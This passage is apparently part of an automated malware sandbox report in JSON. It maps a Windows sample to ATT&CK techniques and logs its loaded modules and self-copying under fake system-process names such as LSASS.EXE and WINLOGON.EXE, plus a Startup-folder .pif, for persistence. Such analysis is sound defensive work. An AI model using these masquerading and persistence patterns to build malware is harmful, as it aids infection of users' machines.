"https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for class \"RegEdit_RegEdit\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for window \"Registry Editor\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for window \"Folder Options\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for window \"Local Settings\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for class \"ExploreWClass\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for class \"CabinetWClass\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for class \"RebarWindow32\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for class \"ComboBoxEx32\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for class \"ComboBox\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for class \"Edit\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71080000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"KERNEL32\" at base 756f0000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c040000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b50000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"ADVAPI32.DLL\" at base 76e90000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"DWMAPI.DLL\" at base 74170000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"SHELL32.DLL\" at base 75b00000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"OLE32.DLL\" at base 758e0000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"COMCTL32.DLL\" at base 74280000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"OLEAUT32.DLL\" at base 77050000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"SETUPAPI.DLL\" at base 771c0000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"CLBCATQ.DLL\" at base 76fc0000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"RPCRT4.DLL\" at base 75a40000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73f20000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"NTMARTA.DLL\" at base 74820000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"USER32\" at base 76a30000\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71080000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4k51k4.exe\" loaded module \"KERNEL32\" at base 756f0000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4k51k4.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c040000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b50000\n \"4k51k4.exe\" loaded module \"ADVAPI32.DLL\" at base 76e90000\n \"4k51k4.exe\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"4k51k4.exe\" loaded module \"DWMAPI.DLL\" at base 74170000\n \"4k51k4.exe\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"4k51k4.exe\" loaded module \"SHELL32.DLL\" at base 75b00000\n \"4k51k4.exe\" loaded module \"OLE32.DLL\" at base 758e0000\n \"4k51k4.exe\" loaded module \"COMCTL32.DLL\" at base 74280000\n \"4k51k4.exe\" loaded module \"OLEAUT32.DLL\" at base 77050000\n \"4k51k4.exe\" loaded module \"CLBCATQ.DLL\" at base 76fc0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73f20000\n \"4k51k4.exe\" loaded module \"NTMARTA.DLL\" at base 74820000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"4k51k4.exe\" loaded module \"SETUPAPI.DLL\" at base 771c0000\n \"4k51k4.exe\" loaded module \"RPCRT4.DLL\" at base 75a40000\n \"4k51k4.exe\" loaded module \"USER32\" at base 76a30000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71080000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 756f0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c040000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74190000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 77050000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 752c0000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 74dc0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b50000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 76e90000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 74170000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 75b00000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 758e0000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74280000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 771c0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 75a40000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 76fc0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73f20000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74820000\n \"IExplorer.exe\" loaded module \"USER32\" at base 76a30000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74190000\n \"4k51k4.exe\" loaded module \"SXS.DLL\" at base 752c0000\n \"4k51k4.exe\" loaded module \"CRYPTSP.DLL\" at base 74dc0000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 74dc0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b50000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 76e90000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 75b00000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 758e0000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74280000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 77050000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 76fc0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 771c0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 75a40000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73f20000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74820000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 76a30000\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 756f0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71080000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71080000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 756f0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74190000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77050000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 752c0000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74dc0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b50000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76e90000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74170000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 75b00000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 758e0000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74280000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 771c0000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75a40000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76fc0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73f20000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74820000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 76a30000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 76e90000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 75b00000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 758e0000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74280000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 77050000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 76fc0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 771c0000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 75a40000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73f20000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74820000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 76a30000\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 756f0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 752c0000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74dc0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b50000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76e90000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 75b00000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 758e0000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74280000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77050000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76fc0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 771c0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 75a40000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73f20000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74820000\n \"LSASS.EXE\" loaded module \"USER32\" at base 76a30000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 756f0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71080000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c040000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74190000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 752c0000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 74dc0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b50000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c040000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74190000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 752c0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74190000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74190000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77050000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 752c0000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74dc0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b50000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76e90000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74170000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 75b00000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 758e0000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74280000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76fc0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73f20000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74820000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 771c0000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75a40000\n \"SMSS.EXE\" loaded module \"USER32\" at base 76a30000\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 756f0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"WINLOGON.EXE\" loaded module \"DWMAPI.DLL\" at base 74170000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71080000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c040000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71080000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c040000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location C:\\4k51k4.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location C:\\4k51k4.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CopyFileA\" to copy C:\\\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005240)\n 